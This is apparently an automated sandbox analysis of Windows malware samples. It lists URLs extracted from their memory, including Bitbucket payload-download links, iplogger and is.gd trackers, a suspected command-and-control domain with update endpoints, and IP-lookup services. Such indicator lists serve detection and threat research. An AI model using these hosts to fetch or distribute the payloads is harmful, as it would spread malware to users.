                      Source: 1234.exe, 0000000F.00000002.385200656.0000000002AE6000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.484278366.000000000386E000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/D
                      Source: 1234.exe, 0000000F.00000002.384954052.0000000002A91000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.484173181.0000000003821000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                      Source: 1234.exe, 0000000F.00000002.384954052.0000000002A91000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                      Source: srvs.exe, 00000015.00000002.484173181.0000000003821000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultP
                      Source: 1234.exe, 0000000F.00000002.384954052.0000000002A91000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.484173181.0000000003821000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                      Source: 1234.exe, 0000000F.00000002.384954052.0000000002A91000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.484173181.0000000003821000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: 1234.exe, 0000000F.00000002.387385172.0000000002E5C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmpString found in binary or memory: http://service.r
                      Source: 1234.exe, 0000000F.00000002.387385172.0000000002E5C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmpString found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
                      Source: 1234.exe, 0000000F.00000002.387385172.0000000002E5C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmpString found in binary or memory: http://support.a
                      Source: 1234.exe, 0000000F.00000002.387385172.0000000002E5C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmpString found in binary or memory: http://support.apple.com/kb/HT203092
                      Source: srvs.exe, 00000015.00000002.484173181.0000000003821000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/
                      Source: 1234.exe, 0000000F.00000002.384954052.0000000002A91000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.484173181.0000000003821000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/0
                      Source: 1234.exe, 0000000F.00000002.385167858.0000000002ADC000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.484173181.0000000003821000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
                      Source: 1234.exe, 0000000F.00000002.384954052.0000000002A91000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.484173181.0000000003821000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                      Source: 1234.exe, 0000000F.00000002.384954052.0000000002A91000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsti
                      Source: srvs.exe, 00000015.00000002.484570685.0000000003975000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.484347085.0000000003898000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                      Source: 1234.exe, 0000000F.00000002.384954052.0000000002A91000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.484173181.0000000003821000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                      Source: 1234.exe, 0000000F.00000002.386418247.0000000002C65000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.484619436.000000000397A000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnviron
                      Source: srvs.exe, 00000015.00000002.484619436.000000000397A000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
                      Source: 1234.exe, 0000000F.00000002.384954052.0000000002A91000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.484173181.0000000003821000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                      Source: 1234.exe, 0000000F.00000002.386246795.0000000002C39000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.484173181.0000000003821000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                      Source: 1234.exe, 0000000F.00000002.384954052.0000000002A91000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.484173181.0000000003821000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                      Source: 1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: 1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: Nb2HQZZDIf.exe, 00000000.00000002.307182139.00000000009AD000.00000004.00000020.sdmp, 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                      Source: Nb2HQZZDIf.exe, 00000000.00000002.307182139.00000000009AD000.00000004.00000020.sdmpString found in binary or memory: http://www.digicert.com/CPS0v
                      Source: 1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                      Source: 1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmp, 1234.exe, 00000002.00000003.226713519.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                      Source: 1234.exe, 00000002.00000003.218810935.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/
                      Source: 1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: 1234.exe, 00000002.00000003.220817436.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html8
                      Source: 1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: 1234.exe, 00000002.00000003.220716049.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlyv
                      Source: 1234.exe, 00000002.00000003.219912815.0000000006011000.00000004.00000001.sdmp, 1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmp, 1234.exe, 00000002.00000003.219879289.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                      Source: 1234.exe, 00000002.00000003.218854259.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/v-s
                      Source: 1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                      Source: 1234.exe, 00000002.00000003.218854259.0000000006011000.00000004.00000001.sdmp, 1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                      Source: 1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                      Source: 1234.exe, 00000002.00000003.218854259.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersZ
                      Source: 1234.exe, 00000002.00000003.221158654.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersb
                      Source: 1234.exe, 00000002.00000003.219078395.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersd
                      Source: 1234.exe, 00000002.00000003.219461418.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designerss
                      Source: 1234.exe, 00000002.00000003.219508500.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designerst
                      Source: 1234.exe, 00000002.00000003.220606804.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comF
                      Source: 1234.exe, 00000002.00000003.226824512.000000000600E000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.coma
                      Source: 1234.exe, 00000002.00000003.220932014.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comalic
                      Source: 1234.exe, 00000002.00000003.221286981.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comalsF
                      Source: 1234.exe, 00000002.00000003.219912815.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comap
                      Source: 1234.exe, 00000002.00000003.221615342.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comcom
                      Source: 1234.exe, 00000002.00000003.220606804.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comcomd
                      Source: 1234.exe, 00000002.00000003.220932014.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comd
                      Source: 1234.exe, 00000002.00000003.220606804.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comdTF
                      Source: 1234.exe, 00000002.00000003.219912815.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comdsed
                      Source: 1234.exe, 00000002.00000003.226824512.000000000600E000.00000004.00000001.sdmp, 1234.exe, 00000002.00000003.226658468.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.come.com
                      Source: 1234.exe, 00000002.00000003.219912815.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comgrito
                      Source: 1234.exe, 00000002.00000003.219345969.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comica
                      Source: 1234.exe, 00000002.00000003.220932014.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comitum
                      Source: 1234.exe, 00000002.00000003.219912815.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comk:
                      Source: 1234.exe, 00000002.00000003.226824512.000000000600E000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.como:
                      Source: 1234.exe, 00000002.00000003.218854259.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comsiv
                      Source: 1234.exe, 00000002.00000003.219078395.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comt
                      Source: 1234.exe, 00000002.00000003.220606804.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comueto3
                      Source: 1234.exe, 00000002.00000003.218854259.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comy
                      Source: 1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
                      Source: 1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                      Source: 1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: 1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: 1234.exe, 00000002.00000003.223065732.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/
                      Source: 1234.exe, 00000002.00000003.223065732.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/:
                      Source: 1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: 1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: 1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                      Source: 1234.exe, 0000000F.00000002.387385172.0000000002E5C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmpString found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
                      Source: 1234.exe, 0000000F.00000002.387385172.0000000002E5C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmpString found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
                      Source: 1234.exe, 00000002.00000003.216456973.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: 1234.exe, 00000002.00000003.216761673.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/-
                      Source: 1234.exe, 00000002.00000003.216456973.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/3
                      Source: 1234.exe, 00000002.00000003.216141867.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/:
                      Source: 1234.exe, 00000002.00000003.216456973.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/;
                      Source: 1234.exe, 00000002.00000003.216400129.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/U
                      Source: 1234.exe, 00000002.00000003.216456973.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
                      Source: 1234.exe, 00000002.00000003.216270942.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/b
                      Source: 1234.exe, 00000002.00000003.216029142.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/cros
                      Source: 1234.exe, 00000002.00000003.216270942.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/crosU
                      Source: 1234.exe, 00000002.00000003.216218362.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/f
                      Source: 1234.exe, 00000002.00000003.216857497.0000000006011000.00000004.00000001.sdmp, 1234.exe, 00000002.00000003.216761673.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
                      Source: 1234.exe, 00000002.00000003.216456973.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/:
                      Source: 1234.exe, 00000002.00000003.216456973.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/U
                      Source: 1234.exe, 00000002.00000003.216456973.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/b
                      Source: 1234.exe, 00000002.00000003.216761673.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/p
                      Source: 1234.exe, 00000002.00000003.216029142.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/p
                      Source: 1234.exe, 00000002.00000003.216029142.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/rz
                      Source: 1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: 1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                      Source: 1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                      Source: 1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
                      Source: 1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
                      Source: 1234.exe, 00000002.00000003.218706456.0000000005FEE000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de
                      Source: 1234.exe, 00000002.00000003.218706456.0000000005FEE000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de2(
                      Source: 1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: 1234.exe, 00000002.00000003.221264276.0000000005FEE000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.dea(
                      Source: 1234.exe, 00000002.00000003.221264276.0000000005FEE000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.dera
                      Source: 1234.exe, 00000002.00000002.313581822.00000000071F2000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: 1234.exe, 00000002.00000003.215590431.0000000006011000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cntS
                      Source: 1234.exe, 0000000F.00000002.385785787.0000000002B7B000.00000004.00000001.sdmpString found in binary or memory: http://yspasenana.xyz
                      Source: 1234.exe, 0000000F.00000002.386246795.0000000002C39000.00000004.00000001.sdmpString found in binary or memory: http://yspasenana.xyz(h
                      Source: 1234.exe, 0000000F.00000002.384954052.0000000002A91000.00000004.00000001.sdmpString found in binary or memory: http://yspasenana.xyz/
                      Source: 1234.exe, 0000000F.00000002.386040704.0000000002BF7000.00000004.00000001.sdmpString found in binary or memory: http://yspasenana.xyz4
                      Source: 1234.exe, 0000000F.00000002.384954052.0000000002A91000.00000004.00000001.sdmpString found in binary or memory: http://yspasenana.xyz:80/
                      Source: 1234.exe, 0000000F.00000002.388024887.0000000002F8C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmp, tmpEE20.tmp.15.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: 1234.exe, 0000000F.00000002.385200656.0000000002AE6000.00000004.00000001.sdmpString found in binary or memory: https://api.ip.sb
                      Source: 1234.exe, srvs.exe, 00000015.00000002.484278366.000000000386E000.00000004.00000001.sdmpString found in binary or memory: https://api.ip.sb/geoip
                      Source: 1234.exe, 0000000F.00000002.382601084.0000000000402000.00000040.00000001.sdmp, srvs.exe, srvs.exe, 00000015.00000002.475705492.0000000000DF2000.00000040.00020000.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                      Source: srvs.exe, 00000015.00000002.484278366.000000000386E000.00000004.00000001.sdmpString found in binary or memory: https://api.ip.sbx
                      Source: 1234.exeString found in binary or memory: https://api.ipify.org
                      Source: srvs.exeString found in binary or memory: https://api.ipify.orgcookies//setti
                      Source: 1234.exe, 0000000F.00000002.382601084.0000000000402000.00000040.00000001.sdmp, srvs.exe, 00000015.00000002.475705492.0000000000DF2000.00000040.00020000.sdmpString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
                      Source: Nb2HQZZDIf.exe, 00000000.00000002.307504905.0000000002D90000.00000004.00000001.sdmp, 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmp, 1234.exe, 0000000F.00000002.385633709.0000000002B1F000.00000004.00000001.sdmpString found in binary or memory: https://aui-cdn.atlassian.com
                      Source: 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com
Source: Nb2HQZZDIf.exe | String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/
Source: Nb2HQZZDIf.exe, 00000000.00000002.307182139.00000000009AD000.00000004.00000020.sdmp | String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/b~
Source: 1234.exe, 0000000F.00000002.385267737.0000000002B04000.00000004.00000001.sdmp, 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmp | String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/c6138a8d-6b23-4fcf-ac63-5ded44dfc386/downloads/74c745b8-de86-
Source: Nb2HQZZDIf.exe, 00000000.00000003.305200649.000000000097C000.00000004.00000001.sdmp | String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/c6138a8d-6b23-4fcf-ac63-5ded44dfc386/downloads/80e8feaa-7504-
Source: 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmp | String found in binary or memory: https://bbuseruploads.s3.amazonaws.com4
Source: 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmp | String found in binary or memory: https://bitbucket.org
Source: Nb2HQZZDIf.exe, 00000000.00000003.305200649.000000000097C000.00000004.00000001.sdmp | String found in binary or memory: https://bitbucket.org/
Source: Nb2HQZZDIf.exe, 00000000.00000003.305200649.000000000097C000.00000004.00000001.sdmp | String found in binary or memory: https://bitbucket.org/luisadoma999/admin/downloads/1234.exe
Source: Nb2HQZZDIf.exe, 00000000.00000003.305200649.000000000097C000.00000004.00000001.sdmp | String found in binary or memory: https://bitbucket.org/luisadoma999/admin/downloads/1234.exel:%
Source: Nb2HQZZDIf.exe, 00000000.00000003.305200649.000000000097C000.00000004.00000001.sdmp | String found in binary or memory: https://bitbucket.org/luisadoma999/admin/downloads/1234.exeu
Source: 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmp, 1234.exe, 0000000F.00000002.385200656.0000000002AE6000.00000004.00000001.sdmp | String found in binary or memory: https://bitbucket.org/luisadoma999/admin/downloads/6.exe
Source: 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmp | String found in binary or memory: https://bitbucket.org4
Source: 1234.exe, 0000000F.00000002.388024887.0000000002F8C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmp, tmpEE20.tmp.15.dr | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 1234.exe, 0000000F.00000002.385633709.0000000002B1F000.00000004.00000001.sdmp | String found in binary or memory: https://d301sr5gafysq2.cloudfront.net;
Source: 1234.exe, 0000000F.00000002.388024887.0000000002F8C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmp, tmpEE20.tmp.15.dr | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 1234.exe, 0000000F.00000002.388024887.0000000002F8C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmp, tmpEE20.tmp.15.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 1234.exe, 0000000F.00000002.388024887.0000000002F8C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmp, tmpEE20.tmp.15.dr | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 1234.exe, 0000000F.00000002.387385172.0000000002E5C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmp | String found in binary or memory: https://get.adob
Source: 1234.exe, 0000000F.00000002.387385172.0000000002E5C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmp | String found in binary or memory: https://helpx.ad
Source: 1234.exe, 1234.exe, 0000000F.00000002.382601084.0000000000402000.00000040.00000001.sdmp, srvs.exe, srvs.exe, 00000015.00000002.475705492.0000000000DF2000.00000040.00020000.sdmp | String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: Nb2HQZZDIf.exe | String found in binary or memory: https://iplogger.org/
Source: Nb2HQZZDIf.exe, Nb2HQZZDIf.exe, 00000000.00000002.308831972.0000000140141000.00000040.00020000.sdmp | String found in binary or memory: https://iplogger.org/1Bwjj7
Source: Nb2HQZZDIf.exe, 00000000.00000003.305082174.00000000008E8000.00000004.00000001.sdmp | String found in binary or memory: https://iplogger.org/1Bwjj7%A_AppData%
Source: Nb2HQZZDIf.exe, 00000000.00000003.305200649.000000000097C000.00000004.00000001.sdmp | String found in binary or memory: https://is.gd/
Source: Nb2HQZZDIf.exe, Nb2HQZZDIf.exe, 00000000.00000003.305200649.000000000097C000.00000004.00000001.sdmp, Nb2HQZZDIf.exe, 00000000.00000002.308831972.0000000140141000.00000040.00020000.sdmp | String found in binary or memory: https://is.gd/dg3E5g
Source: Nb2HQZZDIf.exe, 00000000.00000003.305082174.00000000008E8000.00000004.00000001.sdmp | String found in binary or memory: https://is.gd/dg3E5g%A_AppData%
Source: Nb2HQZZDIf.exe, 00000000.00000003.305200649.000000000097C000.00000004.00000001.sdmp | String found in binary or memory: https://is.gd/dg3E5g7
Source: Nb2HQZZDIf.exe, 00000000.00000003.305200649.000000000097C000.00000004.00000001.sdmp | String found in binary or memory: https://is.gd/dg3E5gA63
Source: Nb2HQZZDIf.exe, 00000000.00000003.305200649.000000000097C000.00000004.00000001.sdmp | String found in binary or memory: https://is.gd/dg3E5gC
Source: Nb2HQZZDIf.exe, 00000000.00000003.305200649.000000000097C000.00000004.00000001.sdmp | String found in binary or memory: https://is.gd/dg3E5gS6%
Source: Nb2HQZZDIf.exe, 00000000.00000003.305200649.000000000097C000.00000004.00000001.sdmp | String found in binary or memory: https://is.gd/dg3E5g_6
Source: Nb2HQZZDIf.exe, 00000000.00000003.305200649.000000000097C000.00000004.00000001.sdmp, 1234.exe, 0000000F.00000002.385654345.0000000002B23000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.484424033.00000000038B1000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.484402616.00000000038AD000.00000004.00000001.sdmp | String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: 1234.exe, 0000000F.00000002.388024887.0000000002F8C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmp, tmpEE20.tmp.15.dr | String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 1234.exe, 0000000F.00000002.388024887.0000000002F8C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmp, tmpEE20.tmp.15.dr | String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Nb2HQZZDIf.exe, 00000000.00000002.306921781.0000000000968000.00000004.00000020.sdmp | String found in binary or memory: https://sectigo.com/CPS0
Source: Nb2HQZZDIf.exe | String found in binary or memory: https://sectigo.com/CPS0C
Source: 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmp, Nb2HQZZDIf.exe | String found in binary or memory: https://sectigo.com/CPS0D
Source: srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
Source: srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: 1234.exe, 0000000F.00000002.387385172.0000000002E5C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_java
Source: 1234.exe, 0000000F.00000002.387385172.0000000002E5C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
Source: 1234.exe, 0000000F.00000002.387385172.0000000002E5C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
Source: 1234.exe, 0000000F.00000002.387385172.0000000002E5C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_real
Source: srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
Source: 1234.exe, 0000000F.00000002.387385172.0000000002E5C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
Source: srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmp | String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: Nb2HQZZDIf.exe, 00000000.00000002.307504905.0000000002D90000.00000004.00000001.sdmp, 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmp, 1234.exe, 0000000F.00000002.385633709.0000000002B1F000.00000004.00000001.sdmp | String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website;
Source: Nb2HQZZDIf.exe, 00000000.00000002.307182139.00000000009AD000.00000004.00000020.sdmp, 1234.exe, 0000000F.00000002.386125107.0000000002C08000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.484347085.0000000003898000.00000004.00000001.sdmp | String found in binary or memory: https://www.digicert.com/CPS0
Source: 1234.exe, 0000000F.00000002.388024887.0000000002F8C000.00000004.00000001.sdmp, srvs.exe, 00000015.00000002.485106038.0000000003AFD000.00000004.00000001.sdmp, tmpEE20.tmp.15.dr | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown | Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443
